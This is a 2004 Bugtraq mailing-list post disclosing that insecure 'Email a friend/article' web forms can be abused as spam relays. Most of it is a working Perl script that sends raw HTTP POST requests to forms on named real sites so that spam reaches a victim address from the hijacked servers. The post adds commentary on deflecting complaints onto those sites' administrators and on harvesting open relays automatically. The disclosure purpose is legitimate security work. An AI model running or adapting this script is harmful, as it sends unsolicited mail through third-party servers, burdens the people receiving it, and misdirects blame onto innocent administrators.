[<prev] [next>] [thread-next>] [day] [month] [year] [list]
Message-ID: <20040426202613.23962.qmail@www.securityfocus.com>
Date: 26 Apr 2004 20:26:13 -0000
From: <cyber_flash@...mail.com>
To: bugtraq@...urityfocus.com
Subject: Spammers can hide behind 'Email a friend/article' scripts.
# Author: Vengy
# Email: cyber_flash@...mail.com
# Description: Spammers can hide behind 'Email a friend/article' scripts.
#
#
# How it works:
# -------------
# This simple perl script will send just 3 identical fake spam messages
# to 'yourname@...rdomain.com' from 'vengy@...m4u.com'. Example:
#
# +------------------------------------------+
# | From : <vengy@...m4u.com> |
# | Sent : Friday, April 9, 2004 6:34 PM |
# | To : <yourname@...rdomain.com> |
# | Subject : To spam or not to spam! |
# | |
# | Urgent! Call me: 1-900-EAT-SPAM |
# | |
# | www.spammmmmm.com |
# +------------------------------------------+
#
# If a spammer or victim sends junk email directly to their ISP SMTP servers,
# network Admins can trace back the connection and deal with the problem.
#
# But, the 'Email a friend' technique will deflect a significant portion of
# the complaints away from spammers and towards the administrators of the hijacked host.
#
# There are possibly zillions of insecure 'Email a friend/article' on the web! (just google it)
# Many allow multiple unrestricted emails to be sent separated by comma's.
# (Imagine an automated harvester to compile a list of open spam servers!)
#
# For demonstrational purposes, here are two random servers:
#
#
# Host: Outgoing SMTP Server: Email Originator:
# ===== ===================== =================
# www.wcqp.com relay.westlaw.com eg-fsite-b12.ecom.tlrg.com
# edinburghnews.scotsman.com macdui.scotsman.com 80-75-65-10.eqsn.net
#
#
# Notes: Relaying is denied (550) when connecting directly to the SMTP servers.
# However, by using email forms, the Originator has access to send messages!
#
#
# Arguments to Send_SPAM are:
# ---------------------------
# 1. Webserver.
# 2. Email script.
# 3. Host.
# 4. Content.
# 5. Email address of Victim.
# 6. Number of copies to send.
use IO::Socket::INET qw(CRLF);
my $victim = 'yourname@...rdomain.com';
my $copies = 3;
my $sender_email = 'vengy@...m4u.com';
my $sender_name = 'vengy';
my $subject = 'To+spam+or+not+to+spam%21';
my $body = 'Urgent!+Call+me:+1-900-EAT-SPAM';
my $spam_url = 'http%3A%2F%2Fwww.spammmmmm.com';
################## Spam Server #1 ##################
Send_SPAM('www.wcqp.com',
'FSL5CS/Custom/emailPageConfirm.asp',
'www.wcqp.com',
'friend_name='.("%2C" x ($copies-1)).'&friend_email='.$victim.'&your_name='.$sender_name.'&your_email='.$sender_email.'&subject='.$subject.'&comments='.$body.'&url='.$spam_url,
$victim,
$copies);
################## Spam Server #2 ##################
Send_SPAM('216.55.105.36.hera.net',
'recommend.php/en/',
'toolbox.academicpriority.co.il',
'recommend='.$spam_url.'&friendsemail='.$victim.'&youremail='.$sender_email.'&yourname='.$sender_name,
$victim,
1);
################## Spam Server #3 ##################
Send_SPAM('www.scotsman.com',
'email2.cfm',
'edinburghnews.scotsman.com',
'id=364942004&referringtemplate='.$spam_url.'&referringquerystring=id%3D&recipientemail='.$victim.'&sendername='.$sender_name.'&senderemail='.$sender_email.'&subject='.$subject.'&message='.$body,
$victim,
$copies);
sub Send_SPAM {
my ($server,$url,$host,$content,$email_to,$email_num) = @_;
$repeat_email_to = ($email_to."%2C") x $email_num;
substr($repeat_email_to,-3,3) = "";
$content =~ s/$email_to/$repeat_email_to/;
$sock = IO::Socket::INET->new(PeerAddr => $server ,PeerPort => 'http(80)',Proto => 'tcp');
die "$!" unless $sock;
$sock->autoflush();
print $sock 'POST /'.$url.' HTTP/1.1',CRLF,
'Host: '.$host,CRLF,
'Content-Type: application/x-www-form-urlencoded',CRLF,
'Content-Length: '.length($content),CRLF,
'Connection: Keep-Alive',CRLF,
'Cache-Control: no-cache',CRLF x 2,
$content;
close $sock;
print "Sent SPAM from server: $server\n";
}
Powered by blists - more mailing lists